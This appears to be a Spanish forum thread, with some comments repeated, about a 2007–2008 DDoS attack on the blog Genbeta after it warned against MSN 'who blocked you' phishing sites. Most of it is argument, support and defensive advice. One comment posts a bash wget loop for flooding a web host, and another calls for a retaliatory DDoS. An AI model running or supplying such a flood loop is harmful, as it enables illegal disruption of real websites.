La empresa líder de blogs española (weblogs) esta sufriendo un ataque DDOS contra uno de sus blogs. En concreto se trata http://www.genbeta.com (Actualmente caído). Al parecer todo viene a raíz de una noticia publicada en ese blog sobre el uso de programas para el MSN que te dicen quien te ha bloqueado. La empresa fue amenazada en caso de que no la retirarla, y hoy, se está cumpliendo dicha amenaza.
#10:
Soy editor de Genbeta y os aseguro que no es un autobombo ni nada por el estilo. Estamos siendo atacados de verdad.
Esperamos volver a estar online pronto.
#15:
Joder en los comentarios se tiran con piedras....
"Estimado Victor,
En blockoo hemos desarrollado una plataforma segura, con la opción de ingresar al mismo formulario con encriptación SSL de 128 Bits. A diferencia de otros sitios de los cuales se conoce su mala intención, blockoo no sigue esta práctica como indicas en tu artículo.
Te invitamos a probarlo y retractarte de tus dichos. Es literalmente imposible que tu cuenta se vea perjudicada dado que no almacenamos la contraseña en nuestro servidor sino en una cookie. Lo cual te permite borrarla en cualquier momento y desloguearte del sitio.
Me parece poco serio que un medio conocido como el de ustedes hable sin investigar previamente a cada ejemplo dado.
Saludos,
Alejandro Sena
#20 | Escrito por Alejandro Sena | 13 nov 2007 20:59:35"
Y le contestan:
"Alejandro Sena, con gusto retractaré y quitaré la mención a Blockoo, si consigues convencerme de lo siguiente:
*Que no usáis la contraseña. Me da igual que la guardéis en una cookie o en el servidor cifrada, yo también soy desarrollador web y sé perfectamente que en el caso de que esa información se guarde en una cookie vosotros podéis recuperarla en el futuro. De hecho, para eso son las cookies, para guardar información en la máquina cliente para después recuperarla con la aplicación web. Si pedís un dato, me da igual que uséis SSL o que no lo guardéis en el servidor, tengo muy claro que desde el momento que el usuario os lo da podéis hacer con él lo que queráis.
*Que vuestro servicio funciona realmente, y logra adivinar quién ha bloqueado a otro usuario. En tal caso, quisiera saber qué método tenéis para comprobarlo, ya que Microsoft no ofrece esa información.
*Que es absolutamente imprescindible conocer la contraseña para realizar esta (imposible) tarea.
En fin, según mi opinión cualquier sitio que afirme saber quién te ha bloqueado es un claro fraude, porque según la propia Microsoft ahora ya no es posible. Pero por favor, si tienes información más actualizada que yo, compártela conmigo y rápidamente te quitaré de este post. Es más, os haré un post solo para vosotros, explicando todo lo que me cuentes y recomendando vuestro uso.
"Víctor, yo no tengo que convencerte de nada, vos tenés que hacer las pruebas para demostrar lo que estás diciendo. No podés tratar de fraudulentos y peligrosos a N sitios solo porque a vos te parece ¿probaste blockoo? ¿te aseguraste que robamos tu contraseña? ¿le pasó algo a tu cuenta? ¿mostramos quienes te bloquearon? ¿verificaste algo de todo lo que dijiste?
Yo no acusé a nadie de nada ni opiné sobre ningún tema, de haberlo hecho seguramente hubiese dado argumentos válidos, que en este caso no existe. Es solo una opinión infundada que, dado el medio en el cual está difundida, puede ser perjudicial para los sitios. Además de que los usuario esperan buena información de Genbeta, con fundamentos y pruebas.
#23 | Escrito por Alejandro Sena | 13 nov 2007 22:04:11"
así se agarran de las greñas...
¿quien sera el del ataque?...
#104:
Como me aburría y tenía un rato libre me he dicho, vamos a tomarnos la molestia de si estos servicios funcionan o no, así que me he creado una cuenta de msn y la he agregado a la mía personal. Luego he probado con esa cuenta creada en dos de estos "servicios", con la cuenta habilitada, deshabilitada, borrada y borrada sin deshabilitar. El resultado es que cuando la cuenta está borrada (este o no desadmitida) te dicen que te tienen no admitido. Y si no lo tienes borrado (igualmente esté o no desadmitida) te sale como admitido. Supongo que existirá algún servicio de Microsoft que informe de los contactos que se tienen en el messenguer y de ahí saquen la información ni idea.
Y sí, ahora tendrán mi email esta gente al estar en la lista de la cuenta que había creado. Pero vamos, como la mitad de la gente que tengo añadida en el messenguer en algún momento han caído en alguno de estos servicios tienen que tener mi email más que repetido.
Ahora me caerá una lluvia de negativos... El caso es que he hecho esto porque había unos cuantos protestando en que si no nos habíamos tomado la molestia de probar si funcionaba. Así que yo lo he hecho.
Toooooodo esto no quita para que a esos servicios se les vea a la legua que son una estafa (como casi todo lo que rodea al messenger, por otro lado) y que lo que están haciendo a weblogssl (de la que suelo leer al menos un par de blogs diariamente) sea algo totalmente repulsivo. Y que yo me una a la campaña de apoyo, publicando el artículo original en mi foro.
#3:
A ver... estará el post original en el caché de google?
Si es así, todos podemos copiar el post y publicarlo en nuestro blog (con fuentes, caro está) como una especia de contraque.
Genbeta es un buen blog, no mi favorito, pero hay ahí cosas muy interesantes.
#34:
Si alguno de los nombrados en el artículo no están de acuerdo, que lo digan, que aporten pruebas, etc. Lo que no se puede hacer es echar abajo una web por decir algo que es verdad. Todos los amigos que tengo que han caído en eso han terminado enviando "spam" sin saberlo. Y, sinceramente, dejar tu nombre de usuario y contraseña en una página cualquiera es una LOCURA.
#132:
#128 Perder dinero estamos perdiendo todos los editores y toda la empresa en general. Los editores porque no podemos publicar y porque las visitas, ergo clicks en la publicidad, son nulas, y lo que ganamos a final de mes se basa en esos dos variables. Ok, no vivimos de esos ingresos, pero al final de mes sí que vienen bien. Y la empresa está perdiendo también por dos motivos: el primero es el mismo, a menos visitas más dinero se pierde, y el segundo que se va a tener que invertir mucho más dinero en infraestructuras que puedan "resistir a un terremoto", lo cual no es nada barato.
Lo de mafiosos te lo puedo explicar también. Son unos mafiosos porque nos están chantajeando con cerrarnos el negocio si no accedemos a sus peticiones. Lo puedes llamar como quieras, pero a mí me parece un acto mafioso.
¿Que algo sacamos de esto? Pues aparte de los apoyos, que se agradecen mucho, supongo que alguna visita más sí que tendremos cuando volvamos en pié (y alguna menos). Pero vamos, para hacer esto cada vez que queramos subir de audiencia, prefiero quedarme como estamos, que no nos va mal. Por ejemplo, una semana sin publicar (ojalá no lleguemos) significa que Google le mete un palo a todas nuestras entradas que ni te imaginas...
Ah, la noticia del aumento de visitas es del mes pasado, de antes del ataque. Así que a mi entender es imposible que esta noticia haya afectado a las visitas a la red, salvo que se haya inventado el viaje en el tiempo, no lo sé.
Cuando pase todo esto podremos publicar datos técnicos y demás: entenderéis que ahora mismo no nos interesa hacer público esos datos en medio de esta batalla, porque les puede beneficiar más a los atacantes que a nosotros mismos. Y vuelvo a repetirlo, muchas gracias a todos los que nos habéis apoyado.
#13:
Yo también curro en WeblogSSL y os aseguro que la cosa va en serio. Aquí otra prueba en el blog personal del coordinador de Genbeta:
#69:
#50 Según la LOPD el que va a almacenar datos personales es el que ha de demostrar que estos estarán a buen recaudo y no serán usados con malos fines.
Por otro lado y dado que son esas webs las que te piden la clave, son ellas las que deben de demostrar que no se usarán con fines maliciosos, bien sea mediante presunción de buena fe (yo por ejemplo supongo que menéamé no cojera y se pondrá a distribuir mi contraseña a terceros, perl cómo lo hagas te faltarán piernas para correr y mundo para esconderte ), o cómo debería ser en este caso mediante una auditoría externa. En caso de no hacerlo mediante una auditoría con un bonito informe ;), la gente tiene todo el derecho del mundo a sospechar de sus métodos (como en este caso) y dudar de lo correcto de sus métodos. Es por eso que en este tipo de temas los más importante es la transparencia de cara al usuario
#55 Lo mejor que puedes hacer es denunciar al responsable de la red. Haciendo un whois de la IP en cuestión mira el campo abuse donde sale un e-mail para reportar usos inadecuados (a veces ofrecen varios aparte del abuse@red.ext para cosas más concretas ie. spam).
#19:
No quería comentar nada porque básicamente no hay ganas y poco se puede hacer ahora para parar ese ataque, al menos desde nuestro lado. Ya os han contestado varias veces en los comentarios, más quisiéramos que fuera mentira, pero para desgracia nuestra es verdad. A los que han meneado la noticia solo me queda darles las gracias por el apoyo, al menos la siguiente vez es posible que se lo piensen.
Ah, soy el que escribió ese artículo y no me arrepiento de haberlo hecho, pero evidentemente lamento que mis compañeros y lectores tengan que aguantar esto por esos impresentables.
#23:
Jo, pues entre el DDOS y el efecto Menéame que deben estar sufriendo...
#26:
¡Publiquemos todos los que tengamos un blog un mirror del artículo ya que la licencia de genbeta lo permite!
En blockoo hemos desarrollado una plataforma segura, con la opción de ingresar al mismo formulario con encriptación SSL de 128 Bits. A diferencia de otros sitios de los cuales se conoce su mala intención, blockoo no sigue esta práctica como indicas en tu artículo.
Te invitamos a probarlo y retractarte de tus dichos. Es literalmente imposible que tu cuenta se vea perjudicada dado que no almacenamos la contraseña en nuestro servidor sino en una cookie. Lo cual te permite borrarla en cualquier momento y desloguearte del sitio.
Me parece poco serio que un medio conocido como el de ustedes hable sin investigar previamente a cada ejemplo dado.
Saludos,
Alejandro Sena
#20 | Escrito por Alejandro Sena | 13 nov 2007 20:59:35"
Y le contestan:
"Alejandro Sena, con gusto retractaré y quitaré la mención a Blockoo, si consigues convencerme de lo siguiente:
*Que no usáis la contraseña. Me da igual que la guardéis en una cookie o en el servidor cifrada, yo también soy desarrollador web y sé perfectamente que en el caso de que esa información se guarde en una cookie vosotros podéis recuperarla en el futuro. De hecho, para eso son las cookies, para guardar información en la máquina cliente para después recuperarla con la aplicación web. Si pedís un dato, me da igual que uséis SSL o que no lo guardéis en el servidor, tengo muy claro que desde el momento que el usuario os lo da podéis hacer con él lo que queráis.
*Que vuestro servicio funciona realmente, y logra adivinar quién ha bloqueado a otro usuario. En tal caso, quisiera saber qué método tenéis para comprobarlo, ya que Microsoft no ofrece esa información.
*Que es absolutamente imprescindible conocer la contraseña para realizar esta (imposible) tarea.
En fin, según mi opinión cualquier sitio que afirme saber quién te ha bloqueado es un claro fraude, porque según la propia Microsoft ahora ya no es posible. Pero por favor, si tienes información más actualizada que yo, compártela conmigo y rápidamente te quitaré de este post. Es más, os haré un post solo para vosotros, explicando todo lo que me cuentes y recomendando vuestro uso.
"Víctor, yo no tengo que convencerte de nada, vos tenés que hacer las pruebas para demostrar lo que estás diciendo. No podés tratar de fraudulentos y peligrosos a N sitios solo porque a vos te parece ¿probaste blockoo? ¿te aseguraste que robamos tu contraseña? ¿le pasó algo a tu cuenta? ¿mostramos quienes te bloquearon? ¿verificaste algo de todo lo que dijiste?
Yo no acusé a nadie de nada ni opiné sobre ningún tema, de haberlo hecho seguramente hubiese dado argumentos válidos, que en este caso no existe. Es solo una opinión infundada que, dado el medio en el cual está difundida, puede ser perjudicial para los sitios. Además de que los usuario esperan buena información de Genbeta, con fundamentos y pruebas.
#23 | Escrito por Alejandro Sena | 13 nov 2007 22:04:11"
así se agarran de las greñas...
¿quien sera el del ataque?...
Si alguno de los nombrados en el artículo no están de acuerdo, que lo digan, que aporten pruebas, etc. Lo que no se puede hacer es echar abajo una web por decir algo que es verdad. Todos los amigos que tengo que han caído en eso han terminado enviando "spam" sin saberlo. Y, sinceramente, dejar tu nombre de usuario y contraseña en una página cualquiera es una LOCURA.
No quería comentar nada porque básicamente no hay ganas y poco se puede hacer ahora para parar ese ataque, al menos desde nuestro lado. Ya os han contestado varias veces en los comentarios, más quisiéramos que fuera mentira, pero para desgracia nuestra es verdad. A los que han meneado la noticia solo me queda darles las gracias por el apoyo, al menos la siguiente vez es posible que se lo piensen.
Ah, soy el que escribió ese artículo y no me arrepiento de haberlo hecho, pero evidentemente lamento que mis compañeros y lectores tengan que aguantar esto por esos impresentables.
#50 Según la LOPD el que va a almacenar datos personales es el que ha de demostrar que estos estarán a buen recaudo y no serán usados con malos fines.
Por otro lado y dado que son esas webs las que te piden la clave, son ellas las que deben de demostrar que no se usarán con fines maliciosos, bien sea mediante presunción de buena fe (yo por ejemplo supongo que menéamé no cojera y se pondrá a distribuir mi contraseña a terceros, perl cómo lo hagas te faltarán piernas para correr y mundo para esconderte ), o cómo debería ser en este caso mediante una auditoría externa. En caso de no hacerlo mediante una auditoría con un bonito informe ;), la gente tiene todo el derecho del mundo a sospechar de sus métodos (como en este caso) y dudar de lo correcto de sus métodos. Es por eso que en este tipo de temas los más importante es la transparencia de cara al usuario
#55 Lo mejor que puedes hacer es denunciar al responsable de la red. Haciendo un whois de la IP en cuestión mira el campo abuse donde sale un e-mail para reportar usos inadecuados (a veces ofrecen varios aparte del abuse@red.ext para cosas más concretas ie. spam).
Estos sitios son un fraude como bien dice el artículo, lo único que pueden hacer es mostrarte la lista de personas que no te tienen en su lista, cosa muy distinta de saber quien te ha bloqueado. Lo mismo que hace por ejemplo el aMSN
Sin rebuscar demasiado, algunos sitios fraudulentos que siguen esta práctica serían: blockoo.com, scanmessenger.com, detectando.com, quienteadmite.info, checkmessenger.net, blockstatus, etc… Todos ellos son potenciales phishing, y ninguno funciona más allá de recolectar cuentas de correo.
#53 La dificultad de detener un DDOS se presenta porque las máquinas atacantes son de cualquier parte del mundo. Estas máquinas están infectadas por un algún tipo de malware que las convierte en máquinas zombie, de forma que pueden atacar un objetivo cuando alguien se lo ordena.
Tengo un pequeño servidor en casa y estoy hasta los c******s de aguantar intentos de entrada por todos lados, SSH, SMTP, HTTP, estos se merecerían que nos juntáramos todos y les pusiéramos el culo (de sus servidores) como un bebedero de patos.
Animo y paciencia.
Estas rabietas que tienen algunos son peores para ellos, en este caso más aun. Ahora esa noticia será más importante. Los blogs la copiarán y llegará a más sitios. Aumentará el número de referencias al artículo en concreto y subirá posiciones en google.
Vamos, en mi opinión los atacantes han salido perdiendo. Genbeta estará caido un tiempo, pero lo que estos querían ocultar será más visible que nunca.
Perdonadme que haya tardado tanto, es que mientras me cargaba la página en caché (que no sé por qué ha tardado tanto) estaba viendo el 4x01 de Perdidos y se me ha ido el tiempo
Aquí está. Y ahora más que nunca: ¡Arriba, Genbeta!
A ver, a los que señalan a Blockoo como autor de este ataque... No los acuséis porque no hay ni siquiera ningún indicio de que son ellos. Además, sin dejar de tener dudas sobre su servicio web, fueron bastante correctos cuando me contestaron en el blog, y no creo que hayan tenido nada que ver.
Estoy haciendo una lista en mi blog (está en mi perfil y en los trackbacks de esta noticia) con todos los blogs que se han solidarizado, si falta alguno dejadme un comentario o trackback
Mis candidatos son blockoo.com, scanmessenger.com y checkmessenger.net por descarte. blockoo está caído y los otros dos puede decirse que son clones el uno del otro, con lo que quedan dos posibles sospechosos. El autor del ataque ha tenido las pocas luces de decir que vive en Ciudad del Este, que está en Paraguay. Eso lo he hecho en 5 minutos, por lo que creo que los de Weblogs SL ya saben quién ha sido.
Me sumo a la lista de trabajadores de Weblogs SL que confirman que el ataque es real. No es, ni mucho menos, una campaña de autobombo, como se ha dicho por ahi.
#50 no se trata de quien tiene que demostrar que, el hecho es que los han amenazado y han cumplido con las amenazas, un ataque DDOS no creo que sea muy legal, vamos digo yo.
No me he leído muchos de los comentarios, pero el protocolo que usa WLM SÍ que te dice quien te ha bloqueado... Sólo que el cliente de Microsoft no incluye esa feature. Pero aMSN sí.
ME acabo de enterar de la noticia. Yo he recibido muchos mails de empresas de ese tipo, y la verdad, hoy dia quien no sabe que no tienes que poner tu contraseña en ningun sitio? Es como el jodido correo-cadena del virus ese que destruye el sector 0 del disco duro y que provoca que el universo implosione.
A veces me dan ganas de borrar mi cuenta de correo, que de pesaos son mis contactos, alguien me los cambia?
Yo me he quedado en el DOS, pero no hay forma de parar el DDOS? Aunque sea de forma temporal, rechazando todas las Ips que no sean de territorio español... es una putada para los que no son de España, pero es algo temporal. O si no, en los logs de acceso coger las IPs que entran habitualmente (de España o fuera) y permitirles el acceso a esas solas? Quizás sea una tontería lo que digo.
#69 Ya, ya, he hecho de todo, pero no sirve de nada, servidores en china, taiwan, polonia, rusia, etc..... incluso en alguna ocasión les he dejado un mensajito directamente en el escritorio (Terminal Server accesible).
#59 En eso tienes razón, está mañana me he encontrado con un pc de un cliente que pertenecía a una botnet, enviaba correos a saco, digo que pertenecía porque ya está capado.
Bueno parece que ya la gente se cree que esto no es una maniobra de autobombo. Ahora un par de temas que se han tratado aquí, no se puede filtrar tráfico. Si se filtra el tráfico ya sea a nivel de firewall o donde sea, se conseguirá que la aplicación no procese este tráfico, lo cual aliviará muchísimo la carga y si el problema es un DoS seguramente se solucione así. El problema es que si es un DDoS super tocho el firewall no dará abasto y caerá. Y ese es el problema actual es un ataque mu grandote.
Sobre lo de distribuir el artículo me parece una muy buena idea, sobre todo la gente que tiene sus blogs en blogger, estoy seguro de que no se van a meter con google. Y si no que lo hagan que así les vemos salir con el culo rojo.
Sobre lo de denunciar, claro que puede hacerse. El problema de todo es como demostrar la autoría de los hechos, estos ataques se realizan con botnets en el extranjera, manejadas a su vez desde otros sitios y seguramente conectados a ella atraves de anonimizadores, es muy difícil
En definitiva a ver como termina todo esto, porque lo de los DDoS es un problema, pero cada vez lo va a ir siendo más y más.
#59 ya, por eso digo lo de filtrar las IPs para que por lo menos los asiduos puedan acceder, aunque no sé la viabilidad de este método, quizás sea peor el remedio que la enfermedad ;D
Yo también puedo asegurar que la noticia no es mentira, hay bastante gente trabajando en solucionarlo, no veo los beneficios de un autobombo así genbeta ahora mismo esta caida y eso no es bueno se mire como se mire.
un ddos de echo creo que es denunciable (aunque es muy dificil de demostrar) supongo que si van a juicio el juez podría pedir la revisión de los correos del sitio denunciado (bueno, ultimamente veo mucho Shark asi que.. )
y btw ya son lentos para parar el ataque con un tcpdump y unas mad skillz de iptables se soluciona en linux (vamos, que al final son siempre los mismos paquetes una y otra vez desde distintos sitios) y si usan freebsd con dummynet hasta podría ser divertido.
Yo también pertenezco a la red de Weblogs S.L. y afirmo, para quien no lo crea, que el ataque es real, tras una amenaza a la que hemos prestado poco caso, y es que a veces nos vienen algunos correos bastante curiosos.
#33 Ese es el problema, que es de fé, no tienen ni una garantía de que no pasa lo que se comenta en el artículo. Y por lo que se ha podido comprobar, la mayoría de los que ofertan ese servicio tienen unas prácticas dudosas para defenderse...
#34, Gracias por el apunte ahora mismo ya se a quien achacar ciertos spams que he recibido últimamente y voy a denunciarlo a los responsables de la red que me lo envió. (La verdad es que no lo había pensado )
#74 Entonces te toca tragar al igual que a mí, la idea es que si reciben 1000 reportes de la misma IP se planteen tomar medidas. Es lo que tiene vivir en un mundo lleno de lusers en el que cualquiera tiene acceso a un ordenador sin saber las consecuencias de lo que está haciendo
La verdad es que tiene narices... Conozco varias personas que cayeron, incluso gente que se supone que trabajan con ordenadores... Pero supongo que la curiosidad mató al gato.
Pero bueno, como siempre pasa con estas cosas al final tienen el efecto contrario. A saber la cantidad de blogs que se hacen eco de esto ahora.
Para los incrédulos que piensan que es autobombo... que prueben a entrar ahora (1.20 de la madrugada) que verán cómo el servidor está 100% caido, aunque afortunadamente parece que nuestro técnico lo ha arreglado en parte y sólo afecta al servidor de genbeta, no a los demás. Hemos estado unos cuantos días con caidas cada pocos minutos, y en toda la red.
Unámonos todos y publiquemos-lo en nuestros respectivos blogs. Se van a CAGAR.
Creo que no estaría mal recopilar una lista de todos los blogs que se sumen a la cruzada. Aunque sea un poco de autobombo, todos los que lo hagan que publiquen el link al artículo en los comentarios. Yo por mi parte voy a hablarlo en mi blog.
Porque la poquísima credibilidad que le quedaba a esos de Blockoo (Porque es evidente que son ellos) se ha esfumado cuando han actuado de esa forma tan rastrera. Si al menos hubieran demostrado lo que dicen...
Es más, podríamos hacer lo que ellos en su propia web. Un ataque DDOS.
Como era esa horterada de "El pueblo unido..." pues ahí queda eso.
Edit:#44 te me has adelantado pero perfecto, a eso es a lo que me referia!!!! Cuando tenga mi articulo te paso el link.
tambien la gente podria poner el link este por ejemplo en el nick dl messenger http://quenotetimenmas.blogspot.com/ .... la mayoria de gente que cae en estas cosas no visita meneame ni la blogosfera
Tiene narices que se dediquen a enmierdarse de esta forma, por algo que conocen todos los usuarios que llevan un tiempo por ahí. Incautos siempre los hay, pero cuando te la cuelan en una ocasión.... no te la vuelven a colar.
Una pregunta q me hago es, ¿para que quiero saber quien me tiene bloqueado?
Por cierto, si os aburrís mucho os dejo un pequeño script en bash para lanzar ataques DOS (con fines educativos sólo, el uso que hagáis de él no es cosa mía). Pero os recuerdo que los ataques DOS son ilegales en españa.
WAITMAX=10; WEB="http://responsable.ext"; PETS=0; while(true) do wget -q -O /dev/null "$WEB"; PETS=`expr "$PETS" + 1`;clear; echo "Enhorabuena, ya has realizado $PETS peticiones ;)"; sleep `expr $RANDOM % ( "$WAITMAX" + 1 )`; done;
No soy ningún experto en seguridad, pero puede ser que los que están atacando a genbeta sean los propios usuarios de algún tipo de programa para el MSN Messenger (A modo de anfitriones del malware).
Vaya por delante que nunca he usado estas páginas y que está claro que no funcionan porque no hay forma de saber quién no te admite (esto lo digo por la que me va a caer). Lo de que guarden y utilicen las cuentas de la gente, si se dice, hay que demostrarlo. Por supuesto que sí.
Mucha tontería con copiar el artículo de un sitio a otro, total, copiar y pegar no da trabajo. ¿Alguien se ha molestado en verificar la versión de unos y otros?
Siempre estamos igual: uno grita "INJUSTICIA" y todos los defensores de la libertad se suben al carro de la diatriba sin pensárselo dos veces.
En serio, de Blockoo me fio. Y no lo he usado. Pero el tio que lo lleva si lo lleva es por que eso tiene montones de visitas y da dinero; y no por que quiera sacar la contraseña. Doy fé.
Comentarios
Soy editor de Genbeta y os aseguro que no es un autobombo ni nada por el estilo. Estamos siendo atacados de verdad.
Esperamos volver a estar online pronto.
Joder en los comentarios se tiran con piedras....
"Estimado Victor,
En blockoo hemos desarrollado una plataforma segura, con la opción de ingresar al mismo formulario con encriptación SSL de 128 Bits. A diferencia de otros sitios de los cuales se conoce su mala intención, blockoo no sigue esta práctica como indicas en tu artículo.
Te invitamos a probarlo y retractarte de tus dichos. Es literalmente imposible que tu cuenta se vea perjudicada dado que no almacenamos la contraseña en nuestro servidor sino en una cookie. Lo cual te permite borrarla en cualquier momento y desloguearte del sitio.
Me parece poco serio que un medio conocido como el de ustedes hable sin investigar previamente a cada ejemplo dado.
Saludos,
Alejandro Sena
#20 | Escrito por Alejandro Sena | 13 nov 2007 20:59:35"
Y le contestan:
"Alejandro Sena, con gusto retractaré y quitaré la mención a Blockoo, si consigues convencerme de lo siguiente:
*Que no usáis la contraseña. Me da igual que la guardéis en una cookie o en el servidor cifrada, yo también soy desarrollador web y sé perfectamente que en el caso de que esa información se guarde en una cookie vosotros podéis recuperarla en el futuro. De hecho, para eso son las cookies, para guardar información en la máquina cliente para después recuperarla con la aplicación web. Si pedís un dato, me da igual que uséis SSL o que no lo guardéis en el servidor, tengo muy claro que desde el momento que el usuario os lo da podéis hacer con él lo que queráis.
*Que vuestro servicio funciona realmente, y logra adivinar quién ha bloqueado a otro usuario. En tal caso, quisiera saber qué método tenéis para comprobarlo, ya que Microsoft no ofrece esa información.
*Que es absolutamente imprescindible conocer la contraseña para realizar esta (imposible) tarea.
En fin, según mi opinión cualquier sitio que afirme saber quién te ha bloqueado es un claro fraude, porque según la propia Microsoft ahora ya no es posible. Pero por favor, si tienes información más actualizada que yo, compártela conmigo y rápidamente te quitaré de este post. Es más, os haré un post solo para vosotros, explicando todo lo que me cuentes y recomendando vuestro uso.
#21 | Escrito por Víctor Pimentel (www.genbeta.com) | 13 nov 2007 21:41:05"
a lo que replican...
"Víctor, yo no tengo que convencerte de nada, vos tenés que hacer las pruebas para demostrar lo que estás diciendo. No podés tratar de fraudulentos y peligrosos a N sitios solo porque a vos te parece ¿probaste blockoo? ¿te aseguraste que robamos tu contraseña? ¿le pasó algo a tu cuenta? ¿mostramos quienes te bloquearon? ¿verificaste algo de todo lo que dijiste?
Yo no acusé a nadie de nada ni opiné sobre ningún tema, de haberlo hecho seguramente hubiese dado argumentos válidos, que en este caso no existe. Es solo una opinión infundada que, dado el medio en el cual está difundida, puede ser perjudicial para los sitios. Además de que los usuario esperan buena información de Genbeta, con fundamentos y pruebas.
#23 | Escrito por Alejandro Sena | 13 nov 2007 22:04:11"
así se agarran de las greñas...
¿quien sera el del ataque?...
A ver... estará el post original en el caché de google?
Si es así, todos podemos copiar el post y publicarlo en nuestro blog (con fuentes, caro está) como una especia de contraque.
Genbeta es un buen blog, no mi favorito, pero hay ahí cosas muy interesantes.
de hecho el articulo fue meneado en su dia
¿Quieres saber quién te tiene no admitido en el MSN? Pues no des tu contraseña a desconocidos
¿Quieres saber quién te tiene no admitido en el MS...
genbeta.compor cierto quien quiera verlo en la caché de google
http://216.239.59.104/search?q=cache:hEZf82EDGloJ:www.genbeta.com/2007/11/13-quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos+genbeta+quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos/&hl=es&ct=clnk&cd=1&gl=es&client=firefox-a
Para quien le interese:
http://es.wikipedia.org/wiki/Ddos
Si alguno de los nombrados en el artículo no están de acuerdo, que lo digan, que aporten pruebas, etc. Lo que no se puede hacer es echar abajo una web por decir algo que es verdad. Todos los amigos que tengo que han caído en eso han terminado enviando "spam" sin saberlo. Y, sinceramente, dejar tu nombre de usuario y contraseña en una página cualquiera es una LOCURA.
Yo también curro en WeblogSSL y os aseguro que la cosa va en serio. Aquí otra prueba en el blog personal del coordinador de Genbeta:
http://resistancefutile.com/2008/02/03/wtf-genbetero-extremo/
Jo, pues entre el DDOS y el efecto Menéame que deben estar sufriendo...
No quería comentar nada porque básicamente no hay ganas y poco se puede hacer ahora para parar ese ataque, al menos desde nuestro lado. Ya os han contestado varias veces en los comentarios, más quisiéramos que fuera mentira, pero para desgracia nuestra es verdad. A los que han meneado la noticia solo me queda darles las gracias por el apoyo, al menos la siguiente vez es posible que se lo piensen.
Ah, soy el que escribió ese artículo y no me arrepiento de haberlo hecho, pero evidentemente lamento que mis compañeros y lectores tengan que aguantar esto por esos impresentables.
¡Publiquemos todos los que tengamos un blog un mirror del artículo ya que la licencia de genbeta lo permite!
Yo voy a ello ahora mismo
http://64.233.183.104/search?q=cache%3Ahttp%3A%2F%2Fwww.genbeta.com%2F2007%2F11%2F13-quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos%2F&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:es-ES:official&client=firefox-a
Salu2!!
#33 ¿no has parado a pensar que quizás saque dinero vendiendo los emails (y contraseñas) a spammers?
al respecto hay un artículo muy interesante llamado "24 servicios que pueden robar tu contraseña de Hotmail y lista de contactos" (link: http://spamloco.net/2008/02/24-servicios-que-pueden-robar-tu.html)
#50 Según la LOPD el que va a almacenar datos personales es el que ha de demostrar que estos estarán a buen recaudo y no serán usados con malos fines.
Por otro lado y dado que son esas webs las que te piden la clave, son ellas las que deben de demostrar que no se usarán con fines maliciosos, bien sea mediante presunción de buena fe (yo por ejemplo supongo que menéamé no cojera y se pondrá a distribuir mi contraseña a terceros, perl cómo lo hagas te faltarán piernas para correr y mundo para esconderte ), o cómo debería ser en este caso mediante una auditoría externa. En caso de no hacerlo mediante una auditoría con un bonito informe ;), la gente tiene todo el derecho del mundo a sospechar de sus métodos (como en este caso) y dudar de lo correcto de sus métodos. Es por eso que en este tipo de temas los más importante es la transparencia de cara al usuario
#55 Lo mejor que puedes hacer es denunciar al responsable de la red. Haciendo un whois de la IP en cuestión mira el campo abuse donde sale un e-mail para reportar usos inadecuados (a veces ofrecen varios aparte del abuse@red.ext para cosas más concretas ie. spam).
#33 ¿Si saca dinero es de fiar? ¡Vaya un argumento!
Estos sitios son un fraude como bien dice el artículo, lo único que pueden hacer es mostrarte la lista de personas que no te tienen en su lista, cosa muy distinta de saber quien te ha bloqueado. Lo mismo que hace por ejemplo el aMSN
http://digg.com/security/BBlogs_vs_DDOS_a_fight_for_the_freedom_of_speech
¡gracias!
Y mi traducción: http://mla.com.es/2008/02/08/bblogs-vs-ddos-english-version/
Corregidme los fallos de traducción que haya tenido que a estas horas no rijo
¡Ah! y que alguien lo copie por si acaso... que no se yo si mi hosting soportaría el efecto digg
Hay que tener en cuenta que Alejandro Sena es el propietario de Techtear.com la competencia de Genbeta.
detener un DDOS:
http://foro.elhacker.net/index.php/topic,137442.0.html
#58, no, aMSN te dice quién no te tiene en su lista de contactos, no quién te tiene "bloqueado". No es lo mismo.
C&P, Según Genbeta, sin señalar a nadie:
Sin rebuscar demasiado, algunos sitios fraudulentos que siguen esta práctica serían: blockoo.com, scanmessenger.com, detectando.com, quienteadmite.info, checkmessenger.net, blockstatus, etc… Todos ellos son potenciales phishing, y ninguno funciona más allá de recolectar cuentas de correo.
#10 voy a transcribir la noticia en mio blog, espero no importe. sobra decir que haré las respectivas referencias.
#53 La dificultad de detener un DDOS se presenta porque las máquinas atacantes son de cualquier parte del mundo. Estas máquinas están infectadas por un algún tipo de malware que las convierte en máquinas zombie, de forma que pueden atacar un objetivo cuando alguien se lo ordena.
Yo estoy hasta las narices de estas cosas.
Una empresa tima, le acusan, y se enfada mandando la página abajo de quien avisó del timo...
Ojala los denuncien!
Yo me uno a la campaña, otro blog más por aquí.
Ale, aqui otra copia del articulo: http://paranoiasvarias.blogspot.com/2008/02/quieres-saber-quin-te-tiene-no.html
Se van a cagar estos HOYGAN mafiosos.
Tengo un pequeño servidor en casa y estoy hasta los c******s de aguantar intentos de entrada por todos lados, SSH, SMTP, HTTP, estos se merecerían que nos juntáramos todos y les pusiéramos el culo (de sus servidores) como un bebedero de patos.
Animo y paciencia.
http://articulos.nolimites.net/mis-articulos/parando-ataques-ddos-t13408.0.html
http://forums.theplanet.com/index.php?s=780e33353feffd45230ae8fc501dbf2f&showtopic=63334&st=0&p=389247entry389247
http://www.internet-description.com/t/tar-pit-information-technology.html
Estas rabietas que tienen algunos son peores para ellos, en este caso más aun. Ahora esa noticia será más importante. Los blogs la copiarán y llegará a más sitios. Aumentará el número de referencias al artículo en concreto y subirá posiciones en google.
Vamos, en mi opinión los atacantes han salido perdiendo. Genbeta estará caido un tiempo, pero lo que estos querían ocultar será más visible que nunca.
#24 http://216.239.59.104/search?q=cache:hEZf82EDGloJ:www.genbeta.com/2007/11/13-quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos+genbeta+quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos/&hl=es&ct=clnk&cd=1&gl=es&client=firefox-a
